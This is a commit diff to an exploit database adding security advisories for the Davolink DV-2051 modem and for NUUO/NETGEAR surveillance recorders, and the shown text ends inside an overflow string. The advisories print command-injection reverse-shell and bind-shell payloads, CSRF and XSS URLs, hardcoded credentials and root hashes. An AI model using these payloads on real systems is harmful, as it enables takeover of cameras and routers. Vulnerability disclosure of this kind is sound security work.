DB: 2016-08-07
8 new exploits NUUO NVRmini2 / NVRsolo / Crystal Devices and NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities ntop 2.3 <= 2.5 - Multiple Vulnerabilities Subrion CMS 4.0.5 - SQL Injection zFTP Client 20061220 - (Connection Name) Local Buffer Overflow PHP Power Browse 1.2 - Directory Traversal Davolink DV-2051 - Multiple Vulnerabilities WordPress Count per Day Plugin 3.5.4 - Stored Cross-Site Scripting NASdeluxe NDL-2400r 2.01.09 - OS Command Injection
This commit is contained in:
parent
75085bf1d7
commit
428f25fc1c
9 changed files with 978 additions and 0 deletions
|
@ -36348,3 +36348,11 @@ id,file,description,date,author,platform,type,port
|
|||
40197,platforms/multiple/dos/40197.txt,"Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - PacketBB Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0
|
||||
40198,platforms/multiple/dos/40198.txt,"Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - WSP Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0
|
||||
40199,platforms/multiple/dos/40199.txt,"Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - RLC Dissector Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0
|
||||
40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices and NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0
|
||||
40201,platforms/linux/remote/40201.txt,"ntop 2.3 <= 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
|
||||
40202,platforms/php/webapps/40202.txt,"Subrion CMS 4.0.5 - SQL Injection",2016-08-05,Vulnerability-Lab,php,webapps,80
|
||||
40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - (Connection Name) Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0
|
||||
40204,platforms/php/webapps/40204.txt,"PHP Power Browse 1.2 - Directory Traversal",2016-08-05,"Manuel Mancera",php,webapps,80
|
||||
40205,platforms/cgi/webapps/40205.txt,"Davolink DV-2051 - Multiple Vulnerabilities",2016-08-05,"Eric Flokstra",cgi,webapps,80
|
||||
40206,platforms/php/webapps/40206.txt,"WordPress Count per Day Plugin 3.5.4 - Stored Cross-Site Scripting",2016-08-05,"Julien Rentrop",php,webapps,80
|
||||
40207,platforms/hardware/webapps/40207.txt,"NASdeluxe NDL-2400r 2.01.09 - OS Command Injection",2016-08-05,"SySS GmbH",hardware,webapps,80
|
||||
|
|
Can't render this file because it is too large.
|
104
platforms/cgi/webapps/40205.txt
Executable file
104
platforms/cgi/webapps/40205.txt
Executable file
|
@ -0,0 +1,104 @@
|
|||
===================================================================
|
||||
Title: Unauthenticated admin password change
|
||||
Product: Davolink modem
|
||||
Tested model: DV-2051
|
||||
Vulnerability Type: Missing Function Level Access Control [CWE-306]
|
||||
Risk Level: High
|
||||
Solution Status: No fix available
|
||||
Discovered and Provided: Eric Flokstra
|
||||
===================================================================
|
||||
|
||||
[-] About the Product:
|
||||
|
||||
The Davolink DV-2051 is an ADSL modem with 4 Fast Ethernet ports,
|
||||
Wireless Access Point and VoIP (2 times FXS).
|
||||
|
||||
[-] Advisory Details:
|
||||
|
||||
Basic authentication is in place to authenticate the administrative user
|
||||
against the web application. To change the administrator password the
|
||||
old password must be provided, which is validated by JavaScript. By
|
||||
intercepting a successful password reset request the JavaScript
|
||||
validation can be bypassed. It was also noticed authorisation checks are
|
||||
missing on the password reset functionality. Combining these
|
||||
vulnerabilities enable unauthenticated users to change the admin
|
||||
password with a single request.
|
||||
|
||||
[-] Proof of Concept:
|
||||
|
||||
The following request can be used to change the admin password to the
|
||||
value ’FooBar’:
|
||||
|
||||
192.168.1.1/password.cgi?usrPassword=FooBar
|
||||
|
||||
========================================================
|
||||
Title: Lack of CSRF protection
|
||||
Product: Davolink modem
|
||||
Tested model: DV-2051
|
||||
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
|
||||
Risk Level: Medium
|
||||
Solution Status: No fix available
|
||||
Discovered and Provided: Eric Flokstra
|
||||
========================================================
|
||||
|
||||
[-] About the Product:
|
||||
|
||||
The Davolink DV-2051 is a an ADSL modem with 4 Fast Ethernet ports,
|
||||
Wireless Access Point and VoIP (2 times FXS).
|
||||
|
||||
[-] Advisory Details:
|
||||
|
||||
The web application enables users to set a password in order for clients
|
||||
to connect to the SSID. Currently no measures against Cross-Site Request
|
||||
Forgery have been implemented and therefore users can be tricked into
|
||||
submitting requests without their knowledge or consent. From the
|
||||
application's point of view these requests are legitimate requests from
|
||||
the user and they will be processed as such. This can result in for
|
||||
example changing the WPA2 password.
|
||||
|
||||
[-] Proof of Concept:
|
||||
|
||||
The following link can be used to trick a logged in user to set the WPA2
|
||||
Pre Shared Key to ‘FooBar01’.
|
||||
|
||||
192.168.1.1/wlsecurity.wl?wlAuthMode=psk2&wlAuth=0&wlWpaPsk=FooBar01&wlWpaGtkRekey=0&wlNetReauth=36000&wlWep=disabled&wlWpa=tkip+aes&wlKeyBit=0&wlPreauth=0
|
||||
|
||||
===============================================================
|
||||
Title: Multiple persistent Cross-Site Scripting vulnerabilities
|
||||
Product: Davolink modem
|
||||
Tested model: DV-2051
|
||||
Vulnerability Type: Cross-Site Scripting [CWE-79]
|
||||
Risk Level: Medium
|
||||
Solution Status: No fix available
|
||||
Discovered and Provided: Eric Flokstra
|
||||
===============================================================
|
||||
|
||||
[-] About the Product:
|
||||
|
||||
The Davolink DV-2051 is a an ADSL modem with 4 Fast Ethernet ports,
|
||||
Wireless Access Point and VoIP (2 times FXS).
|
||||
|
||||
[-] Advisory Details:
|
||||
|
||||
The web application enables users to add virtual servers to direct
|
||||
incoming traffic from WAN side to an internal server with a private IP
|
||||
address on the LAN side. It was noticed insufficient validation is
|
||||
performed on several places such as the ‘srvName’ parameter which is
|
||||
sent with the request when adding a new virtual server. This
|
||||
vulnerability makes it possible to remotely execute arbitrary scripting
|
||||
code in the target user's web browser by adding a persistent JavaScript
|
||||
payload to the application.
|
||||
|
||||
[-] Proof of Concept:
|
||||
|
||||
The following request can be used as POC, it opens port 4444 to an
|
||||
internal IP address. An iframe is added to the ‘srvName’ field and
|
||||
displays a pop-up box.
|
||||
|
||||
192.168.1.1/scvrtsrv.cmd?action=add&srvName=FooBar<iframe%20onload=alert(0)>&srvAddr=192.168.1.100&proto=1,&eStart=4444,&eEnd=4444,iStart=4444,&iEnd=4444,
|
||||
|
||||
[-] Disclosure Timeline:
|
||||
|
||||
[04 06 2016]: Vendor notification
|
||||
[07 06 2016]: Vulnerability confirmed. No fix will be released.
|
||||
[16 07 2016]: Public Disclosure
|
323
platforms/hardware/remote/40200.txt
Executable file
323
platforms/hardware/remote/40200.txt
Executable file
|
@ -0,0 +1,323 @@
|
|||
>> Multiple vulnerabilities in NUUO NVRmini2 / NVRsolo / Crystal devices and NETGEAR ReadyNAS Surveillance application
|
||||
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)
|
||||
==========================================================================
|
||||
Disclosure: 04/08/2016 / Last updated: 04/08/2016
|
||||
|
||||
|
||||
>> Background on the affected products:
|
||||
"NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS functionality. Setup is simple and easy, with automatic port forwarding settings built in. NVRmini 2 supports POS integration, making this the perfect solution for small retail chain stores. NVRmini 2 also comes full equipped as a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping and RAID functions for data protection. Choose NVR and know that your valuable video data is safe, always."
|
||||
"NVRsolo is NUUO’s answer to hassle free, lightweight NVR system. It is small in size yet able to handle heavy duty tasks. With local HDMI/VGA display and keyboard/mouse input built right into the unit, configuring NVRsolo is easy and simple. Built on solid Linux foundation, we sacrificed nothing except unnecessary bulk to make NVRsolo the award winning standalone NVR solution you have been looking for. NVRsolo's flexibility doesn't end there. For those needing more storage options, we offer 8 bay versions to meet your needs."
|
||||
"NUUO Crystal™ is the product that represents the next stage in VMS evolution. Rock solid, easily manageable, with powerful recording and viewing options available. Featuring revolutionary modular system structure that is made to handle large project size, NUUO Crystal™ is the ideal choice for your enterprise. Featuring technology that focuses on delivering stable video recording performance, recording failover, and 3rd party integration choice, you will be impressed with the stability and flexible options with NUUO Crystal™."
|
||||
"(ReadyNAS Surveillance) NETGEAR combines leading storage and switching solutions together with sophisticated network video recording software to provide an affordable and easy to install and manage surveillance solution. Small businesses and corporate branch offices require a secure way to protect physical assets, but may lack deep security expertise or a big budget. A user-friendly NVR system should combine fast and flexible configuration with easy operation. With a few simple steps for installation, the web-based management leads users to configure, monitor and playback video everywhere. UPnP search, auto camera detection and GUI schedule save setting-up time, while the easy drag and drop camera, auto scan, preset point patrolling, and multiple views offer users a prime monitoring experience."
|
||||
|
||||
|
||||
>> Summary:
|
||||
NUUO is a vendor of Network Video Recording (NVR) systems for surveillance cameras. These NVR are Linux embedded video recording systems that can manage a number of cameras and are used worldwide by public institutions, banks, SME's, etc. They also provide a software package to NETGEAR that adds network video recording and monitoring capabilities to the well known NETGEAR ReadyNAS Network Attached Storage systems.
|
||||
|
||||
The web interface contains a number of critical vulnerabilities that can be abused by unauthenticated attackers. These consist of monitoring backdoors left in the PHP files that are supposed to be used by NUUO's engineers, hardcoded credentials, poorly sanitised input and a buffer overflow which can be abused to achieve code execution on NUUO's devices as root, and on NETGEAR as the admin user.
|
||||
|
||||
Although only the NVRmini 2, NVRsolo, Crystal and ReadyNAS Surveillance devices are known to be affected, it is likely that the same code is used in other NUUO devices or even other third party devices (the firmware is littered with references to other devices like NUUO Titan). However this has not been confirmed as it was not possible to access all NUUO and third party devices that might be using the same code.
|
||||
|
||||
A special thanks to CERT/CC (https://www.cert.org/) for assistance with disclosing the vulnerabilities to the vendors [1]. Metasploit exploits for #1, #2 and #3 have been released.
|
||||
|
||||
|
||||
>> Technical details:
|
||||
#1
|
||||
Vulnerability: Improper Input Validation (leading to remote code execution)
|
||||
CVE-2016-5674
|
||||
Attack Vector: Remote
|
||||
Constraints: None, can be exploited by an unauthenticated attacker
|
||||
Affected products / versions:
|
||||
- NUUO NVRmini 2, firmware v1.7.5 to 3.0.0 (older firmware versions might be affected)
|
||||
- NUUO NVRsolo, firmware v1.0.0 to 3.0.0
|
||||
- ReadyNAS Surveillance, v1.1.1 to v1.4.1 (affects both x86 and ARM versions, older versions might be affected)
|
||||
- Other NUUO products that share the same web interface might be affected
|
||||
|
||||
The web inteface contains a hidden file named __debugging_center_utils___.php that improperly sanitises input to the log parameter, which is passed to the PHP system() call (snippet below):
|
||||
|
||||
function print_file($file_fullpath_name)
|
||||
{
|
||||
$cmd = "cat " . $file_fullpath_name;
|
||||
echo $file_fullpath_name . "\n\n";
|
||||
system($cmd);
|
||||
}
|
||||
|
||||
<?php
|
||||
if (isset($_GET['log']) && !empty($_GET['log']))
|
||||
{
|
||||
$file_fullpath_name = constant('LOG_FILE_FOLDER') . '/' . basename($_GET['log']);
|
||||
print_file($file_fullpath_name);
|
||||
}
|
||||
else
|
||||
{
|
||||
die("unknown command.");
|
||||
}
|
||||
?>
|
||||
|
||||
The file can be accessed by an unauthenticated user, and code execution can be achieved with the following proofs of concept:
|
||||
- ReadyNAS Surveillance:
|
||||
GET /__debugging_center_utils___.php?log=something%3bperl+-MIO%3a%3aSocket+-e+'$p%3dfork%3bexit,if($p)%3b$c%3dnew+IO%3a%3aSocket%3a%3aINET(PeerAddr,"192.168.1.204%3a9000")%3bSTDIN->fdopen($c,r)%3b$~->fdopen($c,w)%3bsystem$_+while<>%3b'
|
||||
This will connect a shell back to 192.168.1.204 on port 9000, running as the "admin" user.
|
||||
|
||||
- NVRmini 2 and NVRsolo:
|
||||
GET /__debugging_center_utils___.php?log=something%3btelnet+192.168.1.204+9999+|+bash+|+telnet+192.168.1.204+9998
|
||||
This will connect two shells to 192.168.1.204, one on port 9999 and another on port 9998. To execute commands, echo into the 9999 shell, and receive the output on the 9998 shell. Commands will run as the root user.
|
||||
|
||||
|
||||
#2
|
||||
Vulnerability: Improper Input Validation (leading to remote code execution)
|
||||
CVE-2016-5675
|
||||
Attack Vector: Remote
|
||||
Constraints: Requires an administrator account
|
||||
Affected products / versions:
|
||||
- NUUO NVRmini 2, firmware v1.7.5 to 3.0.0 (older firmware versions might be affected)
|
||||
- NUUO NVRsolo, firmware v1.0.0 to 3.0.0
|
||||
- NUUO Crystal, firmware v2.2.1 to v3.2.0 (older firmware versions might be affected)
|
||||
- ReadyNAS Surveillance, v1.1.1 to v1.4.1 (affects both x86 and ARM versions, older versions might be affected)
|
||||
- Other NUUO products that share the same web interface might be affected
|
||||
|
||||
The handle_daylightsaving.php page does not sanitise input from the NTPServer parameter correctly and passes it to a PHP system() command (code snippet below):
|
||||
else if ($act == 'update')
|
||||
{
|
||||
$cmd = sprintf("/usr/bin/ntpdate %s", $_GET['NTPServer']);
|
||||
|
||||
$find_str = "time server";
|
||||
|
||||
$sys_msg = system($cmd);
|
||||
$pos = strpos($sys_msg, $find_str);
|
||||
|
||||
The file can only be accessed by an authenticted user.
|
||||
- ReadyNAS Surveillance:
|
||||
GET /handle_daylightsaving.php?act=update&NTPServer=bla%3b+whoami+>+/tmp/test
|
||||
This will create a /tmp/test file with the contents of "admin" (current user).
|
||||
|
||||
- NVRmini 2 and NVRsolo:
|
||||
GET /handle_daylightsaving.php?act=update&NTPServer=bla%3brm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.1.204+9000+>/tmp/f
|
||||
Connects a shell to 192.168.1.204, port 9000, running as root.
|
||||
|
||||
- Crystal:
|
||||
GET /handle_daylightsaving.php?act=update&NTPServer=bla%3bbash+-i+>%26+/dev/tcp/192.168.1.204/4444+0>%26
|
||||
Connects a shell to 192.168.1.204, port 4444, running as root.
|
||||
|
||||
|
||||
#3
|
||||
Vulnerability: Administrator password reset
|
||||
CVE-2016-5676
|
||||
Attack Vector: Remote
|
||||
Constraints: None, can be exploited by an unauthenticated attacker
|
||||
Affected products / versions:
|
||||
- NUUO NVRmini 2, firmware v1.7.5 to unknown (latest version v3.0.0 requires authentication)
|
||||
- NUUO NVRsolo, firmware v1.7.5 to unknown (latest version v3.0.0 requires authentication)
|
||||
- ReadyNAS Surveillance, v1.1.1 to v1.4.1 (affects both x86 and ARM versions, older versions might be affected)
|
||||
- Other NUUO products that share the same web interface might be affected
|
||||
|
||||
On older versions of the firmware and in the ReadyNAS Surveillance application unauthenticated users can call the cgi_system binary from the web interface. This binary performs a number of sensitive system commands, such as the loading of the default configuration that resets the administrator password. It seems that at least versions 2.2.1 and 3.0.0 of the NVRmini 2 and NVRsolo firmware are not affected, so this vulnerability was fixed either on these or earlier versions, but ReadyNAS Surveillance is still vulnerable.
|
||||
|
||||
Proof of concept:
|
||||
GET /cgi-bin/cgi_system?cmd=loaddefconfig
|
||||
|
||||
This will reset the admin password of the web interface to admin or password (depending on the firmware version) on all affected devices.
|
||||
|
||||
|
||||
#4
|
||||
Vulnerability: Information disclosure (system processes, available memory and filesystem status)
|
||||
CVE-2016-5677
|
||||
Attack Vector: Remote
|
||||
Constraints: None, can be exploited by an unauthenticated attacker
|
||||
Affected products / versions:
|
||||
- NUUO NVRmini 2, firmware v1.7.5 to 3.0.0 (older firmware versions might be affected)
|
||||
- NUUO NVRsolo, firmware v1.0.0 to 3.0.0
|
||||
- ReadyNAS Surveillance, v1.1.1 to v1.4.1 (affects both x86 and ARM versions, older versions might be affected)
|
||||
- Other NUUO products that share the same web interface might be affected
|
||||
|
||||
The web interface contains a hidden page (__nvr_status___.php) with a hardcoded username and password that lists the current system processes, available memory and filesystem status. This information can be obtained by an unauthenticated user by performing the following request:
|
||||
POST /__nvr_status___.php HTTP/1.1
|
||||
username=nuuoeng&password=qwe23622260&submit=Submit
|
||||
|
||||
|
||||
#5
|
||||
Vulnerability: Harcoded root password
|
||||
CVE-2016-5678
|
||||
Affected products / versions:
|
||||
- NUUO NVRmini 2, firmware v1.0.0 to 3.0.0
|
||||
- NUUO NVRsolo, firmware v1.0.0 to 3.0.0
|
||||
|
||||
The NVRmini 2 and NVRsolo contain two hardcoded root passwords (one is commented). These passwords have not been cracked, but they are present in the firmware images which are deployed to all NVRmini 2 / NVRsolo devices.
|
||||
|
||||
NVRmini 2:
|
||||
#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7:::
|
||||
root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7:::
|
||||
|
||||
NVRsolo:
|
||||
#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7:::
|
||||
root:$1$72ZFYrXC$aDYHvkWBGcRRgCrpSCpiw1:0:0:99999:7:::
|
||||
|
||||
|
||||
#6
|
||||
Vulnerability: Command injection in cgi_main transfer license command
|
||||
CVE-2016-5679
|
||||
Attack Vector: Local / Remote
|
||||
Constraints: Requires an administrator account if exploited remotely; can be exploited locally by any logged in user
|
||||
Affected products / versions:
|
||||
- NUUO NVRmini 2, firmware v1.7.6 to 3.0.0 (older firmware versions might be affected)
|
||||
- ReadyNAS Surveillance, v1.1.2 (x86 and older versions might be affected)
|
||||
|
||||
The transfer_license command has a command injection vulnerability in the "sn" parameter:
|
||||
cgi_main?cmd=transfer_license&method=offline&sn=";<command>;#
|
||||
|
||||
Sample exploit for NVRmini2 (open bind shell on port 4444):
|
||||
GET /cgi-bin/cgi_main?cmd=transfer_license&method=offline&sn="%3bnc+-l+-p+4444+-e+/bin/sh+%26+%23
|
||||
|
||||
NETGEAR Surveillance doesn't have netcat, but we can get an openssl reverse shell to 192.168.133.204:4444 instead:
|
||||
GET /cgi-bin/cgi_main?cmd=transfer_license&method=offline&sn="%3bmkfifo+/tmp/s%3b+/bin/bash+-i+<+/tmp/s+2>%261+|+openssl+s_client+-quiet+-connect+192.168.133.204%3a4444+>+/tmp/s%3b+rm+/tmp/s%3b%23
|
||||
|
||||
> Local exploitation:
|
||||
This vulnerability can be exploited locally by a logged in user to escalate privileges to root on the NVRmini2 and admin on the ReadyNAS with the following command:
|
||||
CGI_DEBUG=qwe23622260 cgi_main transfer_license 'method=offline&sn=<PAYLOAD>'
|
||||
The cgi_main binary is located at "/apps/surveillance/bin/cgi_main" on the ReadyNAS and "/NUUO/bin/cgi_main" on the NVRmini2.
|
||||
|
||||
|
||||
#7
|
||||
Vulnerability: Stack buffer overflow in cgi_main transfer license command
|
||||
CVE-2016-5680
|
||||
Attack Vector: Local / Remote
|
||||
Constraints: Requires an administrator account if exploited remotely; can be exploited locally by any logged in user
|
||||
- NUUO NVRmini 2, firmware v1.7.6 to 3.0.0 (older firmware versions might be affected)
|
||||
- ReadyNAS Surveillance, v1.1.2 (x86 and older versions might be affected)
|
||||
|
||||
The "sn" parameter in transfer_license cgi_main method not only has a command injection vulnerability, but also a stack buffer overflow. Below is the pseudocode of the affected function - as it can be seen in the sprintf line, the "sn" parameter is copied directly into a string with a fixed length of 128 characters.
|
||||
|
||||
Function 0x20BC9C (NVRmini2 firmware v3.0.0):
|
||||
method = getval("method");
|
||||
sn = getval("sn");
|
||||
(...)
|
||||
memset(&command, 0, 128);
|
||||
sprintf(&command, "logger -p local0.info -t 'system' \"Activate license: %s\"", sn);
|
||||
system(&command);
|
||||
|
||||
> For example if the following request is performed:
|
||||
GET /cgi-bin/cgi_main?cmd=transfer_license&method=offline&sn=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
|
||||
|
||||
> A core file is generated:
|
||||
Core was generated by `/NUUO/bin/cgi_main'.
|
||||
Program terminated with signal SIGSEGV, Segmentation fault.
|
||||
#0 0x61616160 in ?? ()
|
||||
(gdb) i r
|
||||
r0 0x0 0
|
||||
r1 0x0 0
|
||||
r2 0x407aa4d0 1081779408
|
||||
r3 0x407aa9e0 1081780704
|
||||
r4 0x61616161 1633771873
|
||||
r5 0x61616161 1633771873
|
||||
r6 0x61616161 1633771873
|
||||
r7 0x61616161 1633771873
|
||||
r8 0x331fc8 3350472
|
||||
r9 0x1 1
|
||||
r10 0x33db54 3398484
|
||||
r11 0x0 0
|
||||
r12 0x1 1
|
||||
sp 0xbedce528 0xbedce528
|
||||
lr 0x61616161 1633771873
|
||||
pc 0x61616160 0x61616160
|
||||
cpsr 0x60000030 1610612784
|
||||
(gdb)
|
||||
|
||||
The request can be sent by an HTTP GET or POST method.
|
||||
|
||||
> A few registers can be controlled with the sn parameter, as it can be seen in the diagram below for the NVRmini2:
|
||||
sn=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa